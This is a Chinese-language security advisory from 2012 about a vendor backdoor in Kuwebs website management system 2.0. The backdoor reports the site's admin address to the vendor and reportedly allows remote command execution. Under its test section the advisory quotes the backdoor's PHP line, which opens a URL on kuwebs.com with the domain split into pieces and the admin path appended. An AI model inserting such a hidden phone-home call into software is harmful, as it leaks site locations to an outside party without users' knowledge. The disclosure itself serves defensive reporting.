发布日期：2012-02-17
更新日期：2012-02-20

受影响系统：

kuwebs kuwebs website management system 2.0

描述：

---

酷纬企业网站管理系统是酷纬信息开发的为企业网站提供解决方案而开发的营销型网站系统。官方在该系统安置了后门。

Kuwebs企业网站管理系统在实现上存在系统后门，会发送后台管理地址到厂商，远程攻击者可以利用这个问题在系统上执行任意命令。

<*来源：network
  
  链接：http://www.wooyun.org/bugs/wooyun-2010-04599
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

fopen('http://www.k'.'uwe'.'bs.com'."/plus/add_rec.php?action=login&url={$adminHttpPath}", "r");



    if('all' == $createflag

建议：

---

厂商补丁：

kuwebs
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.kuwebs.com/

浏览次数：3789
严重程度：0（网友投票）